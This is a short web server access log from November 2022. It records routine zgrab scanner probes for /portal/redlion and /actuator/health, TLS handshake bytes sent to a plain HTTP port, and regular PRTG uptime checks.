192.241.206.161 - - [03/Nov/2022:21:20:10 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.206.161 - - [03/Nov/2022:21:20:21 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.206.161 - - [03/Nov/2022:21:20:35 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Nov/2022:21:20:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.206.161 - - [03/Nov/2022:21:20:48 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.206.161 - - [03/Nov/2022:21:20:49 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:20:50 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:20:51 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.206.161 - - [03/Nov/2022:21:21:01 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:21:31 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Nov/2022:21:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.207.109 - - [03/Nov/2022:21:22:21 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:22:26 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:22:27 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Nov/2022:21:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:24:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.22.43.233 - - [03/Nov/2022:21:25:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.43.233 - - [03/Nov/2022:21:25:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
165.22.43.233 - - [03/Nov/2022:21:25:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Nov/2022:21:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
